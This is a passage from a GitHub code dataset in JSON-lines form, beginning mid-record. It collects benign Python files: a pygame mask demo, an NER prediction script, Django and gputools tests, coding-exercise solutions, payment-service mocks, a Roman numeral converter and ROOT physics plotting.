pygame.SRCALPHA)\npygame.draw.circle(test_image, (255, 0, 0), (70, 70), 70)\npygame.draw.circle(test_image, (0, 255, 0), (130, 70), 70)\npygame.draw.circle(test_image, (0, 0, 255), (70, 130), 70)\npygame.draw.circle(test_image, (255, 255, 255), (130, 130), 70)\n\nmask = ColorMask(test_image, (255, 0, 0))\n\nrun = True\nwhile run:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n window.fill(0)\n window.blit(test_image, (25, 25))\n window.blit(mask.to_surface(), (250, 25))\n pygame.display.flip()\n\npygame.quit()\nexit()","repo_name":"Rabbid76/PyGameExamplesAndAnswers","sub_path":"examples/minimal_examples/pygame_minimal_mask_from_color.py","file_name":"pygame_minimal_mask_from_color.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":158,"dataset":"github-code","pt":"66"} 
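The pygame record above builds a mask from exactly the pixels that match one color: set_colorkey() marks that color transparent, from_surface() then keeps only the opaque pixels, and invert() flips the selection so the set bits are the matching pixels. Below is a minimal sketch, not part of the original file, of how two such masks are typically combined for pixel-level color collision; the surfaces, colors, and the (50, 0) offset are illustrative assumptions, while Mask.overlap() itself is standard pygame API.

import pygame

def color_mask(image, mask_color):
    # Same logic as ColorMask in the record above: select only the
    # pixels whose color equals mask_color.
    mask_image = image.convert()
    mask_image.set_colorkey(mask_color)
    mask = pygame.mask.from_surface(mask_image)
    mask.invert()
    return mask

pygame.init()
pygame.display.set_mode((1, 1))  # convert() requires an initialized display

surf_a = pygame.Surface((200, 200))
pygame.draw.circle(surf_a, (255, 0, 0), (100, 100), 80)      # red disc

surf_b = pygame.Surface((200, 200))
pygame.draw.circle(surf_b, (255, 255, 255), (100, 100), 80)  # white disc

mask_a = color_mask(surf_a, (255, 0, 0))      # bits set on red pixels
mask_b = color_mask(surf_b, (255, 255, 255))  # bits set on white pixels

# Offset of mask_b relative to mask_a; overlap() returns the first
# colliding point, or None when no set bits coincide.
print(mask_a.overlap(mask_b, (50, 0)))

pygame.quit()

Because only the selected color contributes set bits, this answers "do the red pixels of A touch the white pixels of B" rather than the usual whole-sprite overlap test.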
+{"seq_id":"73707002129","text":"import argparse\nimport json\nimport sys\nfrom pathlib import Path\n\nsys.path.append(\"../\")\n\nfrom tqdm import tqdm\nimport torch\nfrom torch.utils.data import DataLoader, Subset\nfrom torch.nn.utils.rnn import pad_sequence\nfrom transformers import AutoTokenizer, AutoModel\n\nfrom utils.dataset import ShinraData\nfrom utils.util import to_parallel, to_fp16\nfrom attribute_extraction.dataset import NerDataset, ner_collate_fn, create_dataset_for_ner\nfrom attribute_extraction.model import BertForMultilabelNER, create_pooler_matrix\n\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n\ndef ner_for_shinradata(model, tokenizer, shinra_dataset, device, bsz=8):\n processed_data = shinra_dataset.ner_inputs\n dataset = NerDataset(processed_data, tokenizer)\n total_preds, _ = predict(model, dataset, device, sent_wise=True)\n\n shinra_dataset.add_nes_from_iob(total_preds)\n\n return shinra_dataset\n\n\ndef predict(model, dataset, device, sent_wise=False):\n model.eval()\n dataloader = DataLoader(dataset, batch_size=8, collate_fn=ner_collate_fn)\n\n total_preds = []\n total_trues = []\n with torch.no_grad():\n for step, inputs in enumerate(dataloader):\n input_ids = inputs[\"tokens\"]\n word_idxs = inputs[\"word_idxs\"]\n\n labels = inputs[\"labels\"]\n\n input_ids = pad_sequence([torch.tensor(t) for t in input_ids], padding_value=0, batch_first=True).to(device)\n attention_mask = input_ids > 0\n pooling_matrix = create_pooler_matrix(input_ids, word_idxs, pool_type=\"head\").to(device)\n\n preds = model.predict(\n input_ids=input_ids,\n attention_mask=attention_mask,\n word_idxs=word_idxs,\n pooling_matrix=pooling_matrix\n )\n\n total_preds.append(preds)\n # test dataの場合truesは使わないので適当にpredsを入れる\n total_trues.append(labels if labels[0] is not None else preds)\n\n attr_num = len(total_preds[0])\n total_preds = [[pred for preds in total_preds for pred in preds[attr]] for attr in range(attr_num)]\n total_trues = [[true for trues in total_trues for true in trues[attr]] for attr in range(attr_num)]\n\n if sent_wise:\n total_preds = [[total_preds[attr][idx] for attr in range(attr_num)] for idx in range(len(total_preds[0]))]\n total_trues = [[total_trues[attr][idx] for attr in range(attr_num)] for idx in range(len(total_trues[0]))]\n\n return total_preds, total_trues\n\ndef parse_arg():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--bert_name\", type=str, help=\"Specify BERT name\")\n parser.add_argument(\"--input_path\", type=str, help=\"Specify input path in SHINRA2020\")\n parser.add_argument(\"--model_path\", type=str, help=\"Specify attribute_list path in SHINRA2020\")\n parser.add_argument(\"--output_path\", type=str, help=\"Specify attribute_list path in SHINRA2020\")\n parser.add_argument(\"--bsz\", type=int, help=\"Specify attribute_list path in SHINRA2020\")\n parser.add_argument(\"--parallel\", action=\"store_true\", help=\"Specify attribute_list path in SHINRA2020\")\n parser.add_argument(\"--fp16\", action=\"store_true\", help=\"whether using inbatch negative\")\n parser.add_argument('--fp16_opt_level', type=str, default=\"O1\")\n parser.add_argument(\"--seed\", type=int, help=\"Specify attribute_list path in SHINRA2020\")\n parser.add_argument(\"--note\", type=str, help=\"Specify attribute_list path in SHINRA2020\")\n\n args = parser.parse_args()\n\n return args\n\nif __name__ == \"__main__\":\n args = parse_arg()\n\n bert = AutoModel.from_pretrained(args.bert_name)\n tokenizer = 
AutoTokenizer.from_pretrained(args.bert_name)\n\n # dataset = [ShinraData(), ....]\n dataset = ShinraData.from_shinra2020_format(Path(args.input_path), get_attributes=True)\n attributes = next(dataset)\n\n model = BertForMultilabelNER(bert, len(attributes)).to(device)\n model.load_state_dict(torch.load(args.model_path))\n\n if args.fp16:\n assert args.fp16_opt_level is not None\n model = to_fp16(model, fp16_opt_level=args.fp16_opt_level)\n\n with open(args.output_path, \"w\") as f:\n step = 0\n for data in tqdm(dataset):\n if data.nes is None:\n continue\n output_dataset = ner_for_shinradata(model, tokenizer, data, device, bsz=args.bsz)\n f.write(\"\\n\".join([json.dumps(n, ensure_ascii=False) for n in output_dataset.nes]))\n step += 1\n if step > 50:\n break\n f.write(\"\\n\")\n","repo_name":"ujiuji1259/shinra-pipeline","sub_path":"src/attribute_extraction/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"12229634760","text":"# from unittest import skip\n\nfrom django.urls import resolve, reverse\n\nfrom recipes import views\n\nfrom .test_recipe_base import RecipeTestBase\n\n\nclass RecipeHomeViewTest(RecipeTestBase):\n def test_recipe_home_view_function_is_correct(self):\n view = resolve(reverse('recipes:home'))\n self.assertIs(view.func, views.home)\n\n def test_recipe_home_view_returns_status_code_200_ok(self):\n response = self.client.get(reverse('recipes:home'))\n self.assertEqual(response.status_code, 200)\n\n def test_recipe_home_view_loads_correct_template(self):\n response = self.client.get(reverse('recipes:home'))\n self.assertTemplateUsed(response, 'recipes/pages/home.html')\n\n # @skip('WIP')\n def test_recipe_home_template_shows_no_recipes_found_if_no_recipes(self):\n response = self.client.get(reverse('recipes:home'))\n self.assertIn(\n '
<h1>No recipes found here</h1>',\n response.content.decode('utf-8')\n )\n\n # # Make the test fail so we come back and resolve it\n # self.fail('Add the fail to force an error')\n\n def test_recipe_home_template_loads_recipes(self):\n self.make_recipe(author_data={\n 'first_name': 'Luiz'\n })\n response = self.client.get(reverse('recipes:home'))\n content = response.content.decode('utf-8')\n reponse_context_recipes = response.context['recipes']\n\n self.assertIn('Recipe title', content)\n self.assertIn('10 Minutos', content)\n self.assertIn('5 Porções', content)\n self.assertIn('Luiz', content)\n self.assertEqual(len(reponse_context_recipes), 1)\n\n def test_recipe_home_template_dont_load_recipes_not_published(self):\n self.make_recipe(is_published=False)\n\n response = self.client.get(reverse('recipes:home'))\n\n self.assertIn(\n '
<h1>No recipes found here</h1>
        ',\n response.content.decode('utf-8')\n )\n","repo_name":"Richardy-Gabriel/django-recipes-project1","sub_path":"recipes/tests/test_recipe_home_view.py","file_name":"test_recipe_home_view.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1896177225","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 16 22:31:28 2019\r\n\r\n@author: SHF_W\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport cv2\r\nimport rules\r\nimport time\r\n\r\n\r\ndef initialize(): \r\n global startTime\r\n startTime = time.time() \r\n \r\n #SetBehaviorClient(behav_,\"robot_0\")\r\n\r\ndef now_time(start): \r\n return time.time() - start\r\n\r\nattack_hold_value = 31\r\nattack_hold_degre = 10 # 초당 value 10씩 감소, 최대 3번, 한 자리에서 계속 공격하지 않게 하는 값. value가 \r\noccupy_hold_value = 200\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n \r\n team1 = 'blue'\r\n team2 = 'red'\r\n robot1 = rules.rules([200,320], team1)\r\n robot3 = rules.rules([200,320], team2)\r\n \r\n '''\r\n ==================================================\r\n Get Value from Black Board\r\n ==================================================\r\n '''\r\n initialize()\r\n #stance = 'passive'\r\n stance = 'aggressive'\r\n \r\n r1_pos = [0.500, 4.500]\r\n r3_pos = [7.5, 4]\r\n #r4_pos = [7.0, .5]\r\n \r\n buff_time = 0\r\n ammo_left = False\r\n \r\n while now_time(startTime) < 20: \r\n f1 = now_time(startTime)\r\n \r\n robot1.init()\r\n robot1.bonus_zone(buff_time, 2, False, 200)\r\n robot1.enemy_zone(stance, r3_pos, 90, 1.5, 50) \r\n robot1.enemy_zone(stance, r3_pos, 90, 1.5, 50) \r\n robot1.reload_zone(stance, now_time(startTime), ammo_left, 10, 100) \r\n robot1.move_cost(stance, r1_pos, -2)\r\n #robot1.enemy_overlap(r3_pos, r4_pos, 25) \r\n robot1.first_occupy(r1_pos)\r\n robot1.wall_limit()\r\n \r\n if int(now_time(startTime))%30 == 0 and now_time(startTime) > 2:\r\n ammo_left = True\r\n \r\n '''\r\n ==================================================\r\n test variable change\r\n ==================================================\r\n '''\r\n flags = np.zeros([10])\r\n if now_time(startTime) >= 5 and now_time(startTime) < 35:\r\n buff_time = 35-now_time(startTime)\r\n if now_time(startTime) >= 5:\r\n buff_time = 65-now_time(startTime)\r\n \r\n r1_score = robot1.raw().getValue(r1_pos)\r\n r1_goal = robot1.raw().getPoint() \r\n pt = now_time(startTime) - f1\r\n print('my_pos : ', r1_score, r1_pos, 'Max :' , r1_goal)\r\n print('Process Time : ', pt , 'FPS:', int(10/pt)/10 ) \r\n \r\n \r\n \r\n ''' enemy'''\r\n robot3.init()\r\n robot3.bonus_zone(buff_time, 2, False, 200)\r\n robot3.enemy_zone(stance, r1_pos, 100, 1.5, 50) \r\n robot3.reload_zone(stance, now_time(startTime), ammo_left, 10, 100) \r\n robot3.move_cost(stance, r3_pos, -2)\r\n robot3.wall_limit()\r\n robot1.first_occupy(r3_pos)\r\n robot1.enemy_occupy(r3_pos)\r\n \r\n r3_score = robot3.raw().getValue(r3_pos)\r\n r3_goal = robot3.raw().getPoint() \r\n \r\n \r\n ''' teleport move'''\r\n if r1_score+50+10 < r1_goal[0] :\r\n r1_pos = r1_goal[1] \r\n \r\n if r3_score+50+10 < r3_goal[0] :\r\n r3_pos = r3_goal[1] \r\n \r\n robot1.plot()\r\n plt.pause(1)\r\n \r\n ","repo_name":"Jwill1994/RobomasterAIChallenge","sub_path":"Decision/decision_map/window_version/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20301057839","text":"class 
Solution:\n def licenseKeyFormatting(self, s: str, k: int) -> str:\n if (len(s)-s.count(\"-\"))%k!=0:\n first=(len(s)-s.count(\"-\"))%k\n firstDone=False\n else:\n firstDone=True\n appendList=[]\n count=0\n intermittentString=\"\"\n for i,st in enumerate(s):\n if st!=\"-\":\n if not firstDone:\n intermittentString+=st\n count+=1\n if count==first:\n firstDone=True\n count=0\n appendList.append(intermittentString.upper())\n intermittentString=\"\"\n else:\n intermittentString+=st\n count+=1\n if count==k:\n count=0\n appendList.append(intermittentString.upper())\n intermittentString=\"\"\n return \"-\".join(appendList)\n \nif __name__==\"__main__\":\n s = \"2-5g-3-J\"\n k = 2\n print(Solution().licenseKeyFormatting(s=s,k=k))","repo_name":"ritishadhikari/leetCode","sub_path":"482_License_Key_Formatting.py","file_name":"482_License_Key_Formatting.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30337665664","text":"import serverUser, modules\n\n\ndef main():\n # Opens the file\n with open(\"input.txt\", \"r\") as f:\n # Reads the file and stores into their respective variables\n ttask = int(f.readline())\n # Checks if it is a valid input\n if ttask < 1 or ttask > 10:\n raise ValueError\n umax = int(f.readline())\n # Checks if it is a valid input again\n if umax < 1 or umax > 10:\n raise ValueError\n # Declares necessary variables for use\n servers, users = [], []\n server_counter = 1\n expenses = 0\n with open(\"output.txt\", \"w\") as output:\n # This while represents every tick\n while True:\n # Checks and deletes every user which has done their task\n modules.clean_users(users)\n\n # Shutdown any server which has 0 users\n modules.shutdown(servers)\n\n number_of_users = f.readline()\n\n # If it contains users to process\n if number_of_users != \"\":\n # Processes the users\n for i in range(int(number_of_users)):\n is_inserted = False\n # Insert a user into a server\n for server in servers:\n if server.is_available():\n server.add_user()\n users.append(serverUser.User(server, ttask))\n is_inserted = True\n break\n\n if not is_inserted:\n servers.append(serverUser.Server(server_counter, umax))\n server_counter += 1\n users.append(serverUser.User(servers[-1], ttask))\n # Write the expenses and exits the program\n # If there are no more servers running\n if not servers:\n output.write('0' + '\\n' + str(expenses))\n break\n # Writes to the output the servers that are active\n output.write(modules.server_string(servers))\n # Calculate the expenses\n expenses += len(servers)\n\nmain()\n","repo_name":"prophylacticoder/topaz_exercise","sub_path":"py/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43627236825","text":"from typing import Dict, Union\n\nimport tempfile\nfrom functools import wraps\nfrom os import path, makedirs\n\n\ndef create_file_struct(base_dir: str, struct: Dict[str, Union[int, dict]]):\n for k, v in struct.items():\n if isinstance(v, int):\n file_name = path.join(base_dir, k)\n\n with open(file_name, \"wb\") as out_file:\n out_file.seek(v - 1)\n out_file.write(b\"\\0\")\n\n elif isinstance(v, dict):\n next_dir_path = path.join(base_dir, k)\n makedirs(next_dir_path)\n\n create_file_struct(next_dir_path, v)\n\n\ndef with_file_structure(struct: Dict[str, Union[int, dict]]):\n def wrapper(func):\n @wraps(func)\n def wrapped(*args, **kwargs):\n 
with tempfile.TemporaryDirectory() as tmp_dir_name:\n create_file_struct(tmp_dir_name, struct)\n\n func(*args, wd=tmp_dir_name, **kwargs)\n\n return wrapped\n\n return wrapper\n","repo_name":"kc41/fspy","sub_path":"tests/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71869202771","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nExponential = __import__('exponential').Exponential\n\n\nnp.random.seed(0)\ndata = np.random.exponential(0.5, 9999).tolist()\ne = Exponential(data)\nprint('f(1):', e.pdf(1))\nprint('F(1):', e.cdf(1))\n\nx = np.arange(0, 15, 0.001)\ny = [e.pdf(v) for v in x]\nz = [e.cdf(v) for v in x]\n\nfig, ax1 = plt.subplots()\nax2 = ax1.twinx()\n\nplt.title('Exponential Distribution')\nax1.hist(data, 60, density=True)\npdf = ax1.plot(x, y, color='red', label='pdf')\ncdf = ax2.plot(x, z, color='green', label='cdf')\nplt.xticks(np.arange(0, 3.5, step=0.5))\nplt.xlim(0, 3)\nplt.ylim(0, 1)\n\nax1.set_xlabel('x')\nax1.set_ylabel('pdf')\nax2.set_ylabel('cdf')\nplt.show()\n","repo_name":"alejogonza/holbertonschool-machine_learning","sub_path":"math/0x03-probability/exponentialplot.py","file_name":"exponentialplot.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26688904006","text":"import collections\n\n\ndef solution(k, tangerine):\n count = collections.Counter(tangerine)\n count = dict(count.most_common())\n value = 0\n answer = 0\n for i in count.keys():\n value += count[i]\n answer += 1\n if value >= k:\n break\n return answer\n","repo_name":"seonghun-dev/Algorithm","sub_path":"programmers/level2/programmers138476.py","file_name":"programmers138476.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"42602440970","text":"#coding=utf-8\n\"\"\"\n@author:weifeng.guo \n@date:2018/11/12 15:12\n@filename:Popular_Words\n\"\"\"\ndef popular_words(strings, words):\n counts = {}\n strings = strings.lower()\n string_list = strings.replace(\"\\n\", \" \").split(\" \")\n for char in words:\n counts[char] = string_list.count(char)\n return counts\n\npopular_words('''When I was One\nI had just begun\nWhen I was Two\nI was nearly new\n''', ['i', 'was', 'three', 'near'])","repo_name":"guoweifeng216/pythonlearn","sub_path":"checkio/Popular_Words.py","file_name":"Popular_Words.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33521073532","text":"import pytest\n\n\n@pytest.fixture\ndef mock_contractor_merch_payments(mockserver):\n @mockserver.json_handler(\n 'contractor-merch-payments/'\n 'internal/v1/contractor-merch-payments/payment/status',\n )\n async def _payment_status_get(request):\n if context.payment_status_get.status != 200:\n return mockserver.make_response(\n status=context.payment_status_get.status,\n json={\n 'code': 'payment_not_found',\n 'message': 'payment_not_found',\n },\n )\n\n payment = {\n 'contractor': {\n 'park_id': 'park-id-0',\n 'contractor_id': 'contractor-id-0',\n },\n 'status': 'pending_merchant_approve',\n 'created_at': context.payment_status_get.created_at,\n 'updated_at': context.payment_status_get.updated_at,\n }\n\n if context.payment_status_get.body is not None:\n 
payment.update(context.payment_status_get.body)\n\n return {'payment': payment}\n\n class PaymentStatusGetContext:\n def __init__(self):\n self.handler = _payment_status_get\n\n self.body = None\n self.status = 200\n self.created_at = '2021-11-12T12:00:00+00:00'\n self.updated_at = '2021-11-12T12:00:00+00:00'\n\n @mockserver.json_handler(\n 'contractor-merch-payments/'\n 'internal/contractor-merch-payments/v1/payment/price',\n )\n async def _payment_price_put(request):\n return context.payment_price_put.body\n\n class PaymentPricePutContext:\n def __init__(self):\n self.handler = _payment_price_put\n\n self.body = {\n 'contractor': {\n 'park_id': 'park-id-0',\n 'contractor_id': 'contractor-id-0',\n },\n 'created_at': '2021-11-12T12:00:00+00:00',\n }\n\n class Context:\n def __init__(self):\n self.payment_status_get = PaymentStatusGetContext()\n self.payment_price_put = PaymentPricePutContext()\n\n context = Context()\n\n return context\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/test_contractor_merch_payments_bot/mocks/contractor_merch_payments.py","file_name":"contractor_merch_payments.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16427102761","text":"# Create a \"Phonebook\" class with \"name\" and \"phone number\" attributes.\n# Implement methods to add and delete a contact, change a contact's data, print information about all contacts, and search for a contact by name.\n\n# define the class\nclass Phonebook:\n all_contacts = []\n\n def __init__(self, name, phone_number):\n self.name = name\n self.phone_number = phone_number\n Phonebook.all_contacts.append(self)\n @classmethod\n def add_contact(cls,contact):\n # guard against duplicates: __init__ already registers every new contact\n if contact not in cls.all_contacts:\n cls.all_contacts.append(contact)\n\n\n def change_phone(self,phone):\n self.phone_number = phone\n\n @classmethod\n def print_contacts(cls):\n for contact in cls.all_contacts:\n print(f'name: {contact.name}, phone number: {contact.phone_number}')\n\n\n @classmethod\n def search_contact(cls, name):\n for contact in Phonebook.all_contacts:\n if contact.name == name:\n print(f'Name: {contact.name}, phone number: {contact.phone_number}' )\n\n\n\n\n\n\n# create contact objects\ncontact1 = Phonebook(\"Иван Иванов\", \"+7 (111) 111-11-11\")\ncontact2 = Phonebook(\"Петр Петров\", \"+7 (222) 222-22-22\")\n\n# add a contact\ncontact3 = Phonebook(\"Сергей Сергеев\", \"+7 (333) 333-33-33\")\nPhonebook.add_contact(contact3)\n\n# change a contact's data\ncontact1.change_phone(\"+7 (444) 444-44-44\")\n\n# print information about all contacts\nPhonebook.print_contacts()\n\n# search for a contact by name\nPhonebook.search_contact(\"Петр Петров\")","repo_name":"zzzolliom/phytonLevelUp2","sub_path":"Home_tasks_3/3_PhoneBook.py","file_name":"3_PhoneBook.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22532237920","text":"from __future__ import print_function, unicode_literals, absolute_import, division\nimport numpy as np\nimport numpy.testing as npt\nimport scipy.ndimage.filters as spf\nfrom itertools import combinations_with_replacement, combinations\nfrom gputools.convolve import gaussian_filter\nfrom gputools.convolve.generic_separable_filters import _gauss_filter\n\n\ndef _test_single(dshape, sigma, dtype = np.float32, strides=(1,1),skip_assert = False):\n x = np.random.randint(0, 240, dshape).astype(dtype)\n\n ss_stride = 
tuple(slice(0,None,s) for s in strides)\n \n out1 = gaussian_filter(x, sigma, strides=strides)\n out2 = spf.gaussian_filter(x, sigma, mode= \"constant\", cval=0)[ss_stride]\n\n print((\"shape: %s sigma: %s strides %s type: %s diff: %.2f\" % (dshape, sigma, strides, dtype,np.amax(np.abs(1.*out1 - out2)))))\n if not skip_assert:\n npt.assert_almost_equal(out1,out2, decimal = 0)\n return out1, out2\n\n\ndef test_all():\n stridess = {2:((1,1),(2,2),(4,3)), 3:((1,1,1),(2,2,2),(4,1,1),(3,2,5))}\n for ndim in (2,3):\n for dshape in combinations([19,31,43],ndim):\n for sigma in combinations_with_replacement([3,4,5],ndim):\n for dtype in (np.float32,np.uint16, np.int32):\n for strides in stridess[ndim]:\n _test_single(dshape,sigma, dtype = dtype, strides=strides)\n\n \nif __name__ == '__main__':\n # x,y = _test_single((10,10,10),(1,1,2), strides=(1,1,1), dtype = np.uint16, skip_assert=True)\n np.random.seed(31)\n x,y = _test_single((19, 31, 43),(3,3,0), strides=(1,1,1), dtype = np.uint16, skip_assert=True)\n\n # ind = np.unravel_index(np.argmax(np.abs(1.*x-y)), x.shape)\n # print(ind)\n\n # print(x[tuple(ind)])\n # print(y[tuple(ind)])\n \n\n # from gputools import get_device\n # get_device().queue.finish()\n","repo_name":"maweigert/gputools","sub_path":"tests/convolve/test_gaussian.py","file_name":"test_gaussian.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"66"} +{"seq_id":"4780968273","text":"from dataclasses import dataclass\n\n\n@dataclass\nclass RomanNumeral:\n symbol: str\n value: int\n\n\nroman_numerals = [\n RomanNumeral(\"M\", 1000),\n RomanNumeral(\"CM\", 900),\n RomanNumeral(\"D\", 500),\n RomanNumeral(\"CD\", 400),\n RomanNumeral(\"C\", 100),\n RomanNumeral(\"XC\", 90),\n RomanNumeral(\"L\", 50),\n RomanNumeral(\"XL\", 40),\n RomanNumeral(\"X\", 10),\n RomanNumeral(\"IX\", 9),\n RomanNumeral(\"V\", 5),\n RomanNumeral(\"IV\", 4),\n RomanNumeral(\"I\", 1),\n]\n\n\ndef to_roman(arabic: int) -> str:\n for numeral in roman_numerals:\n if numeral.value <= arabic:\n return numeral.symbol + to_roman(arabic - numeral.value)\n return \"\"\n\n\ndef to_arabic(roman: str) -> int:\n for numeral in roman_numerals:\n if roman.startswith(numeral.symbol):\n return numeral.value + to_arabic(roman[len(numeral.symbol) :])\n return 0\n\n\n# Seventh pass. 
Minimal naming changes only; clean progression.\n","repo_name":"jorgearanda/katas","sub_path":"roman/roman.py","file_name":"roman.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36018816137","text":"# import scenarios from another folder\r\nimport sys\r\nimport random\r\n# add the scenario and output folders to the system path\r\nsys.path.insert(0,'/scenarios')\r\n\r\n# import functions from the folders\r\n# -- scenario one -- \r\nfrom scenarios.story_one import scenario_one # import scenario_one and the class\r\n# -- scenario two -- \r\nfrom scenarios.scenario_two import scenario_two # import scenario class from the folder \r\n# -- scenario three -- \r\nfrom scenarios.scenario_three import scenario_three # import scenario class from the folder\r\n# -- scenario four --\r\n\r\n# adapt the function into variables for this file\r\n\r\nscenario_one = scenario_one\r\nscenario_two = scenario_two\r\nscenario_three = scenario_three\r\n\r\n# print the variables and length of the variables\r\nprint(scenario_one)\r\nprint(scenario_two)\r\nprint(scenario_three)\r\n\r\n# randomize the scenarios and print them into a file\r\nstory = random.choice([scenario_one, scenario_two])\r\n# print the story\r\nprint(story)\r\n\r\n# saves the reference of the standard output\r\noriginal_stdout = sys.stdout\r\n\r\nwith open('output.txt', 'w') as f:\r\n sys.stdout = f # Change the standard output to the file we created.\r\n print(story) # Prints the story to a file.\r\n print('This message will be written to a file.')\r\n sys.stdout = original_stdout # Reset the standard output to its original value\r\n print('This message will be written to the console.')\r\n\r\n","repo_name":"raphtolentino/Personal-Projects","sub_path":"Twitter-bot/program_files/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72453714408","text":"from ROOT import *\nfrom array import array\nimport sys\nfrom set_style import *\n\ngROOT.SetBatch(1)\n\nf = TFile(sys.argv[1], \"OPEN\")\nt = f.Get(\"pion_tree\")\n\n\nbinning = \"(\" + str(sys.argv[2]) + \",0,\" + sys.argv[3] + \")\"\n\nt.Draw(\"pion_P>>d\" + binning, \"\")\nt.Draw(\"pion_P>>n\" + binning, \"!missed_pion\")\n\nd = gDirectory.Get(\"d\")\nn = gDirectory.Get(\"n\")\n\nd.Sumw2()\nn.Sumw2()\n\nd.Draw()\n\nc0 = TCanvas(\"c0\",\"c0\", 500,400)\nc0.SetTicks(1)\ngStyle.SetOptStat(0)\nset_style( d, \"True #pi Momentum (GeV/c)\", \"\")\nd.Draw()\nc0.SaveAs(\"pion_p.pdf\")\n\n\neff = TEfficiency(n,d)\noutfile = TFile(\"pion_eff.root\", \"RECREATE\")\neff.Write(\"eff\")\n\n\nc1 = TCanvas( \"c1\", \"c1\", 500, 400 )\nc1.SetTicks(1)\neff.SetMarkerStyle(20)\neff.Draw()\nset_style( eff, \"True #pi Momentum (GeV/c)\", \"Efficiency\", form=0)\neff.Draw(\"AP\")\n\n\nc1.SaveAs(sys.argv[4])\n\n\nt.Draw(\"pion_P:pion_len>>d2(15,0,300,10,0,1.4)\", \"\")\nt.Draw(\"pion_P:pion_len>>n2(15,0,300,10,0,1.4)\", \"!missed_pion\")\n\nd2 = gDirectory.Get(\"d2\")\nn2 = gDirectory.Get(\"n2\") \n\neff2 = TEfficiency(n2,d2)\n\n\nset_style( d2, \"True #pi Length (cm)\", \"True #pi Momentum (GeV/c)\")\ngStyle.SetPalette(kBird)\nd2.Draw(\"colz\")\nc1.SaveAs(\"pion_p_len.pdf\")\n\nt.Draw(\"pion_len>>d3(45,0,300)\", \"\")\nt.Draw(\"pion_len>>n3(45,0,300)\", \"!missed_pion\")\n\nd3 = gDirectory.Get(\"d3\")\nn3 = gDirectory.Get(\"n3\") \n\neff3 = TEfficiency(n3,d3)\n\ncLen = TCanvas(\"cLen\", 
\"\", 500, 400)\ncLen.SetTicks()\neff3.SetMarkerStyle(20)\neff3.Draw()\nset_style( eff3, \"True #pi Length (cm)\", \"Efficiency\", form=0)\neff3.Draw(\"AP\")\n\n\n\n\ncHits = TCanvas(\"cHits\", \"\", 500, 400)\ncHits.SetTicks()\nt.Draw(\"pion_hits>>d4(60,0,400)\", \"\")\nt.Draw(\"pion_hits>>n4(60,0,400)\", \"!missed_pion\")\n\nd4 = gDirectory.Get(\"d4\")\nn4 = gDirectory.Get(\"n4\") \n\neff4 = TEfficiency(n4,d4)\n\neff4.SetMarkerStyle(20)\neff4.Draw()\nset_style( eff4, \"True #pi Hits\", \"Efficiency\", form=0)\neff4.Draw(\"AP\")\n\n\n\ncEndZ = TCanvas(\"cEndZ\", \"\", 500, 400)\ncEndZ.SetTicks()\nt.Draw(\"endZ>>d5(100,0,300)\", \"\")\nt.Draw(\"endZ>>n5(100,0,300)\", \"!missed_pion\")\n\nd5 = gDirectory.Get(\"d5\")\nn5 = gDirectory.Get(\"n5\") \n\neff5 = TEfficiency(n5,d5)\n\neff5.SetMarkerStyle(20)\neff5.Draw()\nset_style( eff5, \"Reco Beam End Z (cm)\", \"Efficiency\", form=0)\neff5.Draw(\"AP\")\n\n\n\noutfile.cd()\neff2.Write(\"eff2D\")\neff3.Write(\"eff_len\")\neff4.Write(\"eff_hits\")\neff5.Write(\"eff_endZ\")\nd4.Write(\"hits\")\ncHits.Write(\"c_eff_hits\")\ncEndZ.Write(\"c_eff_endZ\")\ncLen.Write(\"c_eff_len\")\n\noutfile.Close()\n\n","repo_name":"calcuttj/PionStudies","sub_path":"new_draw_pion_eff.py","file_name":"new_draw_pion_eff.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 